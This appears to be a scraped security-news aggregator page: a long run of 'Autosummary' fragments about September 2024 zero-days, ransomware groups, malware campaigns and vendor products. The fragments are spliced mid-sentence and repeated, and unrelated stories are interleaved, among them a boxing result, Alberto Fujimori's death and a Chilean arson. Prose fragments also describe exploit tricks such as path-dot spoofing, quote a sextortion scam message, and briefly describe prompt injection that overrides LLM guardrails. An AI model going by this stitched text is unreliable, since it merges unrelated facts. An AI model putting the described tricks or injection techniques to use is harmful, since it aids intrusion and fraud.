Recently patched Windows flaw CVE-2024-43461 was actively exploited as a zero-day before July 2024 Pierluigi Paganini September 16, 2024 September 16, 2024 Microsoft warns that a recently patched Windows flaw, tracked as CVE-2024-43461, was actively exploited as a zero-day before July 2024. “This zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack surface that can still be exploited by threat actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other kinds of malware.” "Autosummary:
Federal agencies given three weeks to patch Today, CISA has added the MSHTML spoofing vulnerability to its Known Exploited Vulnerabilities catalog, tagging it as actively exploited and ordering federal agencies to secure vulnerable systems within three weeks by October 7, as mandated by Binding Operational Directive (BOD) 22-01. "Autosummary:
A proof-of-concept (PoC) exploit for CVE-2024-29847, a critical remote code execution (RCE) vulnerability in Ivanti Endpoint Manager, is now publicly released, making it crucial to update devices. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711) CVE-2024-40711, a critical vulnerability affecting Veeam Backup & Replication (VBR), could soon be exploited by attackers to steal enterprise data. Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, … More
The post Week in review: Veeam Backup & Replication RCE could soon be exploited, Microsoft fixes 4 0-days appeared first on Help Net Security.
"Autosummary:
Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, including those for a handful of zero-days (CVE-2024-38217, CVE-2024-38226, CVE-2024-38014, CVE-2024-43461) exploited by attackers in the wild, and a Windows 10 code defect (CVE-2024-43491) that rolled back earlier CVE fixes. New infosec products of the week: September 13, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Druva, Huntress, Ketch, LOKKER, Tenable, Trellix, and Wing Security. "Autosummary:
"Autosummary:
The Port confirmed that an unauthorized actor accessed and encrypted parts of their computer systems, disrupting key services like baggage handling, check-in kiosks, ticketing, Wi-Fi, and parking.The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "Autosummary:
The CVE-2024-43461 zero-day In July, Check Point Research and Trend Micro both reported on the same attacks that exploited Windows zero-days to infect devices with the Atlantida info-stealer, used to steal passwords, authentication cookies, and cryptocurrency wallets from infected devices. "Autosummary:
The 34-year-old"s record improved to 62-2-2 while 27-year-old Berlanga, born in New York and of Puerto Rican heritage, is now 22-1. "Autosummary:
"Autosummary:
Ivanti Cloud Service Appliance flaw is being actively exploited in the wild Pierluigi Paganini September 14, 2024 September 14, 2024 Ivanti warned that recently patched flaw CVE-2024-8190 in Cloud Service Appliance (CSA) is being actively exploited in the wild. "Autosummary:
U.S. CISA adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog Pierluigi Paganini September 14, 2024 September 14, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog. "Autosummary:
Kiosk mode theft According to OALABS researchers who uncovered this peculiar attack method, it has been used in the wild since at least August 22, 2024, mainly by Amadey, a malware loader, info-stealer, and system reconnaissance tool first deployed by hackers in 2018. "Autosummary:
"Autosummary:
"Rain Technology announced ATM Switchable Privacy, designed to protect consumers against visual hackers and snoopers at ATM terminals in financial institutions, retail stores, restaurants, airports, and other public settings. ATM stats and state of the market With more than three million ATMs around the world and a global ATM market size estimated to reach $28 billion by 2026, ATMs within retail and banking settings represent a significant risk point for merchants, retailers and banks as … More
The post Rain Technology protects consumers against visual hackers and snoopers at ATM terminals appeared first on Help Net Security.
"Autosummary:
“Businesses can foster trust and loyalty, improve the customer journey, protect physical safety, mitigate the risk of data breaches, and ensure regulatory compliance — a winning proposition that promotes a more secure, transparent and mutually beneficial relationship between businesses and their customers.Rain Technology announced ATM Switchable Privacy, designed to protect consumers against visual hackers and snoopers at ATM terminals in financial institutions, retail stores, restaurants, airports, and other public settings. "Autosummary:
The largest number of infections was reported in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia. "Autosummary:
With the influx of skilled affiliates, RansomHub has seen a surge in successful attacks, including those against a division of Rite Aid, Frontier, Planned Parenthood, Halliburton, Christie"s, Last month, a joint advisory between the FBI, CISA, and the Department of Health and Human Services (HHS) reported that RansomHub breached 210 victims from a wide range of critical U.S. infrastructure sectors since it launched in February. "Autosummary:
"23andMe denies the claims and allegations set forth in the Complaint, denies that it failed to properly protect the Personal Information of its consumers and users, and further denies the viability of Settlement Class Representatives’ claims for statutory damages," the company said in the filed preliminary settlement. "Autosummary:
On the same day, it also patched almost two dozen other high and critical severity flaws in Ivanti EPM, Workspace Control (IWC), and Cloud Service Appliance (CSA). "Autosummary:
Hadooken hitting hard Once the attackers breach an environment and get sufficient privileges, they download a shell script named "c" and a Python script named "y." The two scripts both drop Hadooken, but the shell code also tries to look for SSH data in various directories and uses the info to attack known servers, the researchers say. "Autosummary:
"Autosummary:
Our passwordless, phishing-resistant MFA allows users to log in with a touch or glance and supports the broadest range of operating systems on the market, including Windows, Android, macOS, iOS, Linux, and ChromeOS, so users can log in seamlessly no matter what device they prefer to use.The second benefit is that, as an application that lives on the device, it can provide real-time risk data about the device, such as firewall enabled, biometric-enabled, disk encryption enabled, and more. "Autosummary:
Notable among the features are its ability to record screen activity, log keystrokes, harvest photos and SMS messages, remotely control the infected device to conduct on-device fraud (ODF), and abuse Android"s accessibility services API to carry out HTML overlay attacks as well as perform clicks and gestures on the device. "Autosummary:
"Autosummary:
New Linux malware called Hadooken targets Oracle WebLogic servers Pierluigi Paganini September 13, 2024 September 13, 2024 A new Linux malware called Hadooken targets Oracle WebLogic servers, it has been linked to several ransomware families. "Autosummary:
In a data breach notification published on its website, the company reported that affected information varied by individual but potentially included some combination of the following data elements: names, addresses, phone numbers, medical record number, treatment and diagnosis information, including Current Procedural Terminology (CPT) codes, and health insurance information. "Autosummary:
" The Port"s decision to take systems offline and the ransomware gang encrypting those that weren"t isolated in time caused outages impacting multiple services and systems, including baggage, check-in kiosks, ticketing, Wi-Fi, passenger display boards, the Port of Seattle website, the flySEA app, and reserved parking. "Concerns about the trustworthiness of internal data exist in nearly all organizations globally, according to TeamViewer. 99% of business leaders pointed to factors undermining trust in internal data, citing multiple versions of the truth (38%), conflicting data management practices (32%) and too many instances of poor hardware reliability (31%) as top reasons for mistrust. Organizations face technology connectivity gaps Interestingly this mistrust of internal data varies across company size. It is more likely to be … More
The post Internal disconnects vs. cybersecurity: How connectivity shapes challenges appeared first on Help Net Security.
"Autosummary:
When asked how seamless technology connectivity could help their organization: 80% of respondents state is allows for better customer interactions and increases customer satisfaction 81% say it enables better innovation 82% believe it allows more time for considered decision making 86% consider it an important aspect of working at their company increasing talent retention The research also uncovered a correlation between excellent connectivity and industry leadership, with 33% of business leaders at organizations with excellent technology connectivity saying their financial performance is among the leaders in their industry. "Autosummary:
"After a long battle with cancer, our father, Alberto Fujimori, has just departed to meet the Lord," his children Keiko, Hiro, Sachie and Kenji said in a joint statement. "In this Help Net Security, Erica Banks, VP and a leader in Booz Allen’s civilian services business, discusses the Federal Cybersecurity Strategy’s role in safeguarding national assets. Banks outlines key areas for improvement, including funding, talent retention, and leveraging AI for enhanced cyber defense. The Federal Cybersecurity Strategy is a crucial part of protecting national assets. How effective do you think the current strategy is in mitigating cyber threats, and what areas need more attention … More
The post Top priorities for federal cybersecurity: Infrastructure, zero trust, and AI-driven defense appeared first on Help Net Security.
"Autosummary:
Given the diverse range of missions these federal agencies support, it is essential that they are protected against disruptive cyber threats, and zero trust principles — assume a breach; never trust, always verify; allow only least-privileged access – can provide protection in real time.With the National Cyber Strategy Implementation Plan pushing for a more aggressive approach to cyber preparedness and constant attacks increasing the pressure for accountability, companies and the U.S. government need to be strategically allocating roles, responsibilities, and resources to outpace evolving threats. Banks outlines key areas for improvement, including funding, talent retention, and leveraging AI for enhanced cyber defense. "AI has become a key player in protecting valuable organizational insights from threats. Thanks to AI-enabled data protection practices such as behavior monitoring, enterprises no longer have to be reactive to a cyberattack but can be proactive before a potential threat arises. In this Help Net Security video, Andrew Riddell, Principal Cybersecurity Architect, Logicalis US, explains the benefits and best practices of leveraging AI for cybersecurity.
The post Benefits and best practices of leveraging AI for cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Re-elected for a third term amid allegations of ballot rigging 2000: Flees to Japan after Montesinos scandal breaks 2005: Detained in Chile at the Peruvian authorities" request 2007: Extradited from Chile to face trial in Peru 2007: Jailed for six years for abuse of power 2009: Convicted of human rights abuses, jailed for 25 years 2017: AFP Alberto Fujimori was imprisoned for human rights abuses in 2009, however he said the charges were politically motivated Though this shock therapy brought great hardship for ordinary Peruvians, it ended rampant hyperinflation and paved the way for sustained economic growth in the second half of the 1990s. "Every type of fraud is on the rise, and 2023 was a particularly devastating year for victims of cryptocurrency and business email compromise (BEC) scams, according to the FBI. Cryptocurrency fraud Based on complaints filed to FBI’s Internet Crime Complaint Center (IC3) in 2023, the year saw over $5.6 billion in losses tied to cryptocurrency fraud alone, marking a dramatic 45% increase over 2022 figures. Criminals are exploiting the difficulties of tracing and recovering cryptocurrency … More
The post Losses due to cryptocurrency and BEC scams are soaring appeared first on Help Net Security.
"Autosummary:
While these transfers can be reversed by banks if the victim acts quickly, and there are mechanisms for recovering large international wire transfers stolen from US victim bank accounts (e.g., the Financial Fraud Kill Chain, INTERPOL’s Global Rapid Intervention of Payments) and law enforcement teams that can help (e.g., FBI’s Recovery Asset Team), there was a 9% increase in identified global exposed losses between December 2022 and December 2023, according to the FBI. "Autosummary:
GitLab addressed arbitrary pipeline execution vulnerabilities multiple times in recent months, including in July 2024, to fix CVE-2024-6385, in June 2024, to fix CVE-2024-5655, and in September 2023 to patch CVE-2023-5009, all rated critical. The release is for versions 17.3.2, 17.2.5, and 17.1.7 for both GitLab Community Edition (CE) and Enterprise Edition (EE), and patches a total of 18 security issues as part of the bi-monthly (scheduled) security updates. "Autosummary:
Here’s how it works: Data Backup Access: You can download a backup from iCloud or Google, which includes: Device location tracking Movement history with timestamps Correspondence from popular messaging apps like Telegram, WhatsApp, and iMessage Photo and video materials stored on the smartphone Social Media Analysis: Utilizing AI and extensive data, our service can: Check user registration and analyze behavior on platforms like Facebook and Twitter Investigate activity on popular dating apps such as Tinder, AdultFriendFinder, Hinge, and OkCupid But since many victims, including our co-worker, used The Knot’s services, we contacted them and received this statement from a spokesperson: “We were notified of user concerns, and after investigation by our cybersecurity team, determined there is no evidence of unauthorized access to our systems.”(We have all [his/her] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all [his/her] contacts) and are willing to give you a full access to this data. "The UK National Crime Agency has arrested and detained a suspect – a 17-year-old male in Walsall (West Midlands) – on suspicion of Computer Misuse Act offences in relation to the Transport for London (TfL) cyberattack, the agency has announced today. Also today, TfL has provided some insight into what their investigation has discovered, namely, that the attack was fist noticed on September 1 (Sunday), and that some customer data has been accessed – though … More
The post Suspect arrested over the Transport for London cyberattack appeared first on Help Net Security.
"Autosummary:
"NETSCOUT announced updates to its advanced, scalable deep packet inspection-based Omnis Cyber Intelligence Network Detection and Response (NDR) platform. New MITRE ATT&CK behavioral analytics enable earlier detection of advanced threats like ransomware, suspicious traffic, or unauthorized access attempts while improving remediation to help meet industry and country compliance requirements. “Digital resilience allows enterprises to continuously operate and quickly leverage digital opportunities to serve their customers, especially during economically challenging times,” stated Fernando Montenegro, senior principal … More
The post NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics appeared first on Help Net Security.
"Autosummary:
“NETSCOUT helps its customers strengthen their digital resilience by enabling easier detection, faster response, and more effective recovery from cyber threats,” stated Jerry Mancini, senior director, office of the CTO, NETSCOUT. "Among the security updates released by Adobe on Tuesday are those for various versions of Adobe Acrobat and Reader, which fix two critical flaws that could lead to arbitrary code execution: CVE-2024-45112 and CVE-2024-41869. Nothing in the advisory points to a need for users to implement the updates quickly, but the fix for CVE-2024-41869 is actually an additional, more complete fix for CVE-2024-39383, which was supposedly addressed with a security update released in August 2024. … More
The post Adobe completes fix for Reader bug with known PoC exploit (CVE-2024-41869) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Active since at least 2014, the group has a track record of conducting phishing attacks in the Middle East to deliver a variety of custom backdoors such as Karkoff, Shark, Marlin, Saitama, MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah for information theft. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Malicious PowerShell script deployed by the attackers Source: Trend Micro Next, the attackers use the legitimate Windows utility ‘msiexec.exe’ to install various remote access tools (RATs) through MSI packages, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote. "Autosummary:
Last Friday, TfL staff was still facing system outages and disruptions, including the inability to respond to customer requests submitted via online forms, issue refunds for journeys paid with contactless methods, and more. "Autosummary:
Google, who reportedly paid Apple $20 billion to be the default search engine, will display results in Safari, along with ads, hence the lucrative partnership. Hey Siri, google “Apple phone support” While Apple products are designed with simplicity in mind, we’ve all come across an issue at some point that we need assistance with. "Autosummary:
Targets of the ongoing campaign include countries such as Armenia, Azerbaijan, Iceland, Kazakhstan, Kyrgyzstan, Pakistan, Russia, Tajikistan, Ukraine, and Uzbekistan. "Autosummary:
In a new report by Dr.Web, researchers found 1.3 million devices infected with the Vo1d malware in over 200 countries, with the largest number detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia. "Autosummary:
“An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number of Fortinet customers, and we have communicated directly with customers as appropriate,” a company spokesman told Cyber Daily. "Autosummary:
In a new report by Dr.Web, researchers found 1.3 million devices infected with the Vo1d malware in over 200 countries, with the largest number detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia. "Healthcare institutions are custodians of vast repositories of sensitive patient data, encompassing comprehensive health histories, insurance profiles, and billing data. The ramifications of a data breach often extend far beyond the immediate task of patching the vulnerabilities and notifying the affected parties. Often, the less visible costs of these incidents can be equally, if not more, devastating to healthcare providers and the patients they serve. The aftermath of a cyberattack can reverberate for months, impacting … More
The post Cybersecurity is a fundamental component of patient care and safety appeared first on Help Net Security.
"Autosummary:
Cyber threats impact everyone, from doctors and nurses to IT staff, administrators, and patients, which is why protections and policies must be equally as widespread throughout healthcare providers’ workflows. The aftermath of a cyberattack can reverberate for months, impacting an organization from legal, financial, operational, and empathetic standpoints. "ACISO HTX | Singapore | Hybrid – View job details As an ACISO, you will formulate Agency ICT security strategy and work plan, alignment to MHA and HTX’s IT & Cybersecurity strategic directions. Evaluate existing IT environment against MHA and HTX’s IT & Cybersecurity strategic directions. Ensure security governance, compliance by implementing cyber security risk assessment and risk acceptance at appropriate Agency stakeholders. Review, endorse, develop risk management and mitigation plans. Audit / Risk / … More
The post Cybersecurity jobs available right now: September 11, 2024 appeared first on Help Net Security.
"Autosummary:
Engineer – Artificial Intelligence Presight | UAE | On-site – View job details As an Engineer – Artificial Intelligence, you will design, develop, and optimize computer vision algorithms and models for various surveillance applications, including object detection, tracking, activity recognition, and anomaly detection. Junior Cybersecurity Engineer Quintech Electronics & Communications | USA | On-site – View job details As a Junior Cybersecurity Engineer, you will assist with configuration and management for network devices and security, manage identity and access authorization, process access requests to network resources, including network shares, firewall ACLs, etc. Evaluate and decrease instances of inappropriate or excessive access to promote the principle of least privilege. Principal Associate, Penetration Tester Capital One | USA | Hybrid – View job details As a Principal Associate, Penetration Tester, you will perform penetration testing of APIs, web applications, networks, and cloud services, as well as related applications and infrastructure. Audit / Risk / Compliance Manager Hapag-Lloyd AG | India | On-site – View job details As an Audit / Risk / Compliance Manager, you will design and implement a governance framework specific to IT Infrastructure and Operations to track, manage, and resolve audit findings, risks, and compliance issues. IAM Systems Engineer AIDA Cruises | Germany | Hybrid – View job details As a IAM Systems Engineer, you will be responsibile for the development, maintenance and implementation of IAM systems including User lifecycle Management, authentication, and access controls ensuring confidentiality, integrity and availability of IAM systems and data. "Saviynt announced the release of its Intelligence Suite with general availability of Intelligent Recommendations, which will provide customers with dynamic roles, access recommendations, actionable insights, and a multi-dimensional weighted trust scoring model that will be a true game changer. “Saviynt Intelligence will transform identity security from a set of purely operational processes into ones that are automated with artificial intelligence (AI) and machine learning (ML). Our experience is that this actionable intelligence will reduce access … More
The post Saviynt Intelligence delivers identity security analytics through ML and AI capabilities appeared first on Help Net Security.
"Autosummary:
This is Saviynt’s third-generation peer analytics engine, capable of analyzing distinct peer clusters for various identity types, including workforce, contractors, externals, machines, and privileged accounts. "Autosummary:
"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user"s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said. "Autosummary:
Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability CVE-2024-38226 (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability CVE-2024-43491 (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability "Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement. "Autosummary:
Microsoft Patch Tuesday security updates for September 2024 addressed four actively exploited zero-days Pierluigi Paganini September 11, 2024 September 11, 2024 Microsoft Patch Tuesday security updates for September 2024 addressed 79 flaws, including four actively exploited zero-day flaws. "Autosummary:
"Autosummary:
Highline Public Schools school district suspended its activities following a cyberattack Pierluigi Paganini September 11, 2024 September 11, 2024 Highline Public Schools, a school district in Washington state, remains closed following a cyberattack that occurred two days ago. "Autosummary:
RansomHub ransomware gang relies on Kaspersky TDSKiller tool to disable EDR Pierluigi Paganini September 11, 2024 September 11, 2024 Researchers observed the RansomHub ransomware group using the TDSSKiller tool to disable endpoint detection and response (EDR) systems. "Autosummary:
"Autosummary:
PoC exploit discovered in June The Acrobat Reader zero-day was discovered in June through EXPMON, a sandbox-based platform created by cybersecurity researcher Haifei Li to detect advanced exploits such as zero-days or hard-to-detect (unknown) exploits. "Kali Linux 2024.3 is now available for download. Besides the new tools, this release mainly focuses on behind-the-scenes updates and optimization. New tools in Kali Linux 2024.3 This Kali release is about new tools and package updates: goshs – Think SimpleHTTPServer, but written in Go, and with more features graudit – Grep Rough AUDIT: source code auditing tool gsocket – Allows two machines on different networks to communicate with each other hekatomb – Extract and … More
The post Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Data centres in the UK are to be classified as critical national infrastructure, joining the emergency services, finance and healthcare systems, and energy and water supplies. "Autosummary:
If you think you’ve been scammed In the worst-case scenario, you may need to: Freeze your credit/debit cards, contact your bank/card provider and apply for new ones.Fake subscription renewal notice (Image source: Reddit) Invoice fraud: Similarly to the above, you receive an email containing a fake invoice for non-existent services rendered.In this variation, they’re from Geek Squad, and will trick you into giving them remote access to your computer, which they will use to download actual malware to search for sensitive personal and financial information.Here are the most common we’ve observed: Auto-renewal: You receive an email reminding you that a non-existent subscription to a Best Buy or Geek Squad service is coming to an end and will auto-renew unless you click a link. "Crashes due to faulty updates are nothing new; in fact, one reason IT teams often delay updates is their unreliability and tendency to disrupt the organization’s day-to-day operations. Zero-days are also an old phenomenon. In the past, due to a lack of cybersecurity awareness among even the largest vendors and their users, zero-days were not only more common but also often publicly available, enabling script kiddies to exploit them. Another thing that was usual in … More
The post Tech stack uniformity has become a systemic vulnerability appeared first on Help Net Security.
"Autosummary:
Today, we see a much smaller number of operating systems in widespread use, and even “different” Linux distributions often share common codebases, which means that, for example, a bug or vulnerability affecting Ubuntu would probably also affect Linux Mint.Furthermore, organizations can adopt hybrid systems, where redundancy is achieved between the company’s own network and the cloud, or benefit from multi-cloud systems, where different cloud providers are utilized simultaneously. Tech stack diversity used to limit the impact of a single faulty update or exploit, but we are now experiencing an era of dwindling vendor and product diversity in critical systems (through, in certain industries, this has been a long-standing issue). "Open-source cybersecurity tools provide transparency and flexibility, allowing users to examine and customize the source code to fit specific security needs. These tools make cybersecurity accessible to a broader range of organizations and individuals. In this article, you will find a list of 33 open-source cybersecurity tools for Linux, Windows, and macOS that you should consider to enhance protection and stay ahead of potential threats. Authentik: Open-source identity provider Authentik is an open-source identity provider … More
The post 33 open-source cybersecurity solutions you didn’t know you needed appeared first on Help Net Security.
"Autosummary:
SELKS: Open-source Suricata IDS/IPS, network security monitoring, threat hunting SELKS is a free, open-source, turnkey solution for Suricata-based network intrusion detection and protection (IDS/IPS), network security monitoring (NSM), and threat hunting. Cilium: Open-source eBPF-based networking, security, observability Cilium is an open-source, cloud-native solution that leverages eBPF technology in the Linux kernel to provide, secure, and monitor network connectivity between workloads. Sinon: Open-source automatic generative burn-in for Windows deception hosts Sinon is an open-source, modular tool for the automatic burn-in of Windows-based deception hosts. Ghidra: Open-source software reverse engineering framework Ghidra, a cutting-edge open-source software reverse engineering (SRE) framework, is a product of the National Security Agency (NSA) Research Directorate. "Autosummary:
“Slim CD is providing individuals with information on how to place a fraud alert and security freeze on one’s credit file, the contact details for the national consumer reporting agencies, information on how to obtain a free credit report, a reminder to remain vigilant for incidents of fraud and identity theft by reviewing account statements and monitoring free credit reports, and encouragement to contact the Federal Trade Commission, their state Attorney General, and law enforcement to report attempted or actual identity theft and fraud.” "Autosummary:
- ESET NoName has been using brute force to gain access to networks but the threat actor also exploits several vulnerabilities that are more likely to be present in SMB environments: • CVE-2017-0144 (aka EternalBlue), • CVE-2023-27532 (a vulnerability in a Veeam Backup & Replication component) • CVE-2021-42278 and CVE-2021-42287 (AD privilege escalation vulnerabilities) through noPac • CVE-2022-42475 (a vulnerability in FortiOS SSL-VPN) • CVE-2020-1472 (aka Zerologon) Before launching the encryptor, ScRansom kills a list of processes and services on the Windows host, including Windows Defender, the Volume Shadow Copy, SVCHost, RDPclip, LSASS, and processes associated with VMware tools. "Autosummary:
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), while also serving as a conduit for a new hacking tool dubbed FDMTP, which is a "simple malware downloader" implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP). "Autosummary:
Below are the descriptions for these vulnerabilities: CVE-2016-3714 ImageMagick Improper Input Validation Vulnerability CVE-2017-1000253 Linux Kernel PIE Stack Buffer Corruption Vulnerability CVE-2024-40766 SonicWall SonicOS Improper Access Control Vulnerability CVE-2016-3714 flaw (aka ImageTragick), in the popular image manipulation software ImageMagick could allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka “ImageTragick.” "Autosummary:
Firefighter "who wanted to be hero" arrested over deadly Chile blaze Police said the suspect had set the blaze because "he likes to be a hero, participating and helping in emergencies". "Autosummary:
The company said it is not aware of anyone yet using the exposed information: “Although Slim CD presently has no evidence that any such information has been used to commit identity theft or fraud, Slim CD is providing information about the event, Slim CD’s response, and resources available to individuals to help protect their information from possible misuse.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. A subsequent investigation by a third-party specialist revealed that cybercriminals had access to Slim CD’s systems for 10 months, between August 17, 2023, and June 15, 2024. "Autosummary:
(We have all [his/her] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all [his/her] contacts) and are willing to give you a full access to this data. Based on speculation among Reddit users, BleepingComputer contacted a wedding planning site called The Knot, which was listed as a possible source, but received no reply. "Galileo is delivering fintechs, banks and businesses new ways to fight fraud with the launch of Galileo Instant Verification Engine (GIVE) and Transaction Risk GScore. As digital transactions surge and cyber threats evolve, these tools offer fintechs, financial institutions and businesses advanced real-time fraud detection and risk management capabilities, addressing an industry in which 63% of financial firms reported an increase in fraud, with digital channels contributing to half of the total fraud losses. Galileo … More
The post Galileo delivers real-time fraud detection for fintechs, banks and businesses appeared first on Help Net Security.
"Autosummary:
As digital transactions surge and cyber threats evolve, these tools offer fintechs, financial institutions and businesses advanced real-time fraud detection and risk management capabilities, addressing an industry in which 63% of financial firms reported an increase in fraud, with digital channels contributing to half of the total fraud losses. Why GIVE and GScore matter The Galileo Instant Verification Engine and GScore empower financial institutions, fintechs and businesses to navigate the complexities of an increasingly digital financial landscape, reducing fraud, improving operational efficiency, and delivering a seamless customer experience across multiple payment channels. "The US Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2024-40766 – a recently fixed improper access control vulnerability affecting SonicWall’s firewalls – to its Known Exploited Vulnerabilities catalog, thus confirming it is being actively exploited by attackers. Though the KEV entry does not say that it’s being leveraged in ransomware campaigns, both Arctic Wolf and Rapid7 say that there is indirect evidence pointing to that. What we know so far On the same day … More
The post CISA confirms that SonicWall vulnerability is getting exploited (CVE-2024-40766) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" In a nutshell, the three clusters work hand in hand, while simultaneously focusing on specific tasks in the attack chain: infiltrating target environments and conducting reconnaissance (Alpha), burrow deep into the networks using various C2 mechanisms (Bravo), and exfiltrating valuable data (Charlie). "Autosummary:
Not only do they monitor configurations, users, devices, and other elements of the SaaS stack, but they are essential in detecting all non-human identities, including shadow applications. Email security tools routinely scan email traffic, looking for malicious links, phishing attempts, malware attachments, and other email-borne threats.When shadow apps are in use, IT teams may be blind to potential threats, unable to detect unauthorized data transfers, or unaware of risks stemming from outdated or insecure applications. "Autosummary:
" The attack, however, could be transformed into a stealthy one during working hours by reducing the pixel colors to very low values prior to transmission -- i.e., using RGB levels of (1,1,1), (3,3,3), (7,7,7), and (15,15,15) -- thereby giving the impression to the user that the screen is black.Prior studies undertaken by Dr. Guri have employed sounds generated by computer fans (Fansmitter), hard disk drives (Diskfiltration), CD/DVD drives (CD-LEAK), power supply units (POWER-SUPPLaY), and inkjet printers (Inkfiltration). "Autosummary:
In April 2022, the same group claimed the responsibility for DDoS attacks on the sites of institutions in states such as the USA, Estonia, Poland, the Czech Republic, and also on NATO sites. “Poland has registered up to 1,000 online attacks daily targeting government institutions and agencies, officials said, linking them to the country’s support for neighboring Ukraine in its 2 1/2-year war against Russia’s invasion.” reported the Associated Press. "Autosummary:
EDR agents are more advanced solutions that operate, at least partially, at the kernel level, as they need to monitor and control low-level system activities such as file access, process creation, and network connections, all providing real-time protection against threats like ransomware. "Autosummary:
To exploit this flaw, attackers can add a dot or space to the target executable path (for instance, adding it to the binary name like "powershell.exe.") or create an LNK file with a relative path like ".\target.exe." "Autosummary:
The number of bugs in each vulnerability category is listed below: 30 Elevation of Privilege Vulnerabilities 4 Security Feature Bypass Vulnerabilities 23 Remote Code Execution Vulnerabilities 11 Information Disclosure Vulnerabilities 8 Denial of Service Vulnerabilities 3 Spoofing Vulnerabilities To learn more about the non-security updates released today, you can review our dedicated articles on the new Windows 11 KB5043076 cumulative update and Windows 10 KB5043064 update. "Autosummary:
It offers a user-friendly interface, an extensive collection of templates, an app market to expand functionality, SEO tools, and dedicated e-commerce tools to handle payments and shipping. "Autosummary:
" Targets of ScRansom attacks span manufacturing, pharmaceuticals, legal, education, healthcare, technology, hospitality, leisure, financial services, and regional government sectors. POORTRY, detected as far back as in 2021, is also referred to as BURNTCIGAR, and has been used by multiple ransomware gangs, including CUBA, BlackCat, Medusa, LockBit, and RansomHub over the years. "Autosummary:
"September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, including those for a handful of zero-days (CVE-2024-38217, CVE-2024-38226, CVE-2024-38014, CVE-2024-43461) exploited by attackers in the wild, and a Windows 10 code defect (CVE-2024-43491) that rolled back earlier CVE fixes. The actively exploited flaws Let’s start with the only one that was previously publicly known: CVE-2024-38217, a vulnerability that allows attackers to bypass Mark of the Web (MotW). Elastic Security researcher Joe Desimone … More
The post Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes appeared first on Help Net Security.
"Autosummary:
September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, including those for a handful of zero-days (CVE-2024-38217, CVE-2024-38226, CVE-2024-38014, CVE-2024-43461) exploited by attackers in the wild, and a Windows 10 code defect (CVE-2024-43491) that rolled back earlier CVE fixes. Other vulnerabilities of note CVE-2024-43491 is an interesting vulnerability that has effectively rolled back the fixes for some vulnerabilities affecting Optional Components – e.g., Internet Explorer 11, Windows Media Player, MSMQ server core, etc. – on Windows 10, version 1507. "Autosummary:
The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and previously unknown vulnerabilities. "Autosummary:
"Cybercriminals are beginning to take advantage of the new malicious options that large language models (LLMs) offer them. LLMs make it possible to upload documents with hidden instructions that are executed by connected system components. This is a boon to cybercriminals and, thus, a substantive risk to the enterprises using them. LLMs can be tricked in many ways. Cybercriminals can input malicious prompts that trick the LLM into overriding its guardrails (i.e., generating harmful outputs), … More
The post AI cybersecurity needs to be as multi-layered as the system it’s protecting appeared first on Help Net Security.
"Autosummary:
